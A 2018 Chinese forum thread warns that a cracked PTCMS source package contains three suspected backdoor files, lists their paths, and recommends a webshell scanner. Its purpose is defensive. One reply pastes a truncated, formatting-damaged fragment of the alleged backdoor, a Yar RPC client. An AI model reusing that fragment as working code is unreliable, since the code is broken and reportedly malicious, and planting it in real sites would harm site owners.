昨天下载了个大佬分享的PTCMS开心版，里面有三个木马。

BQQ

https://www.hs2v.com/forum.php?mod=viewthread&tid=443648

昨天一直没时间弄，刚刚开始弄，扫了一下发现有三个文件不对。

这位大佬从淘宝买的，但淘宝店主不知道哪里弄的，而且很有可能就是淘宝店主放的马。

下载了并使用了的，注意一下：

[ol]

\ptcms\library\yarclient.php

\ptcms\driver\view\mc.php

\ptcms\library\bae\BaeImageService.class.php[/ol]复制代码

其中第一个文件yarclient.php铁定是个后门，后面两个疑似后门。

有phper大佬帮忙检查一下这三个文件，再分享出来吧。

funders

慕大夜 发表于 2018-4-18 21:54

大佬你是怎么查杀的？我不会这个，百度在线查杀，还下了个叫护卫神的查杀没查出 ...
下次看到不错的源码 先解压出来 用D盾扫一下，基本可疑的东西都能扫出来，然后自己打开看一下
http://www.d99net.net/down/WebShellKill_V2.0.9.zip

guoshuang629

感谢大佬告知！

no45920

谢谢大佬提醒，前排关注一下

cmse

广而告之。。。。。

biubiu

虽然不懂php，但是第一个的这个名字



yar->backyard->后庭->菊花->后门

yokide

是不是应该让，@我是人  处理一下呢？

慕大夜

我 草 不会吧，我找源码没有扫的习惯也不会，多谢提醒，我这就去255了，防止别的mjj上当，之前用了我分享的源码的mjj都查下！给大家道歉，不好意思！

modianxia

uri = $uri;
        }

        public function __call($method, $params = array()) {
            $data = $this->pack($method, $params);
            if ($res = $this->exec($data)) {
                return $res;
            }
            exit('采集错误！方法' . $method . ' 参数：' . json_encode($params));
        }

        public function exec($data) {
            //执行最多5次，防止失败！
            for ($i = 1; $i uri, $data);
                if ($content) return $this->unpack($content);
            }
            return false;
        }

        /**
         * from Yar_Simple_Protocol
         *
         * @param $method
         * @param $params
         * @return array
         */
        public static function pack($method, $params) {
            $struct = array(
                'i' => time(),
                'm' => $method,
                'p' => $params,
            );
            $body = str_pad('PHP', 8, chr(0)) . serialize($struct);
            //transaction id
            $header = sprintf('%08x', mt_rand());
            //protocl version
            $header .= sprintf('%04x', 0);
            //magic_num, default is: 0x80DFEC60
            $header .= '80DFEC60';
            //reserved
            $header .= sprintf('%08x', 0);
            //reqeust from who
            $header .= sprintf('%064x', 0);
            //request token, used for authentication
            $header .= sprintf('%064x', 0);
            //request body len
            $header .= sprintf('%08x', strlen($body));
            $data = '';
            for ($i = 0; $i
慕大夜 发表于 2018-4-18 21:47

我 草 不会吧，我找源码没有扫的习惯也不会，多谢提醒，我这就去255了，防止别的mjj上当，之前用了我 ...
我想了下还是不255，这样没人看到了，我已经把网盘地址去掉了。

慕大夜

大佬你是怎么查杀的？我不会这个，百度在线查杀，还下了个叫护卫神的查杀没查出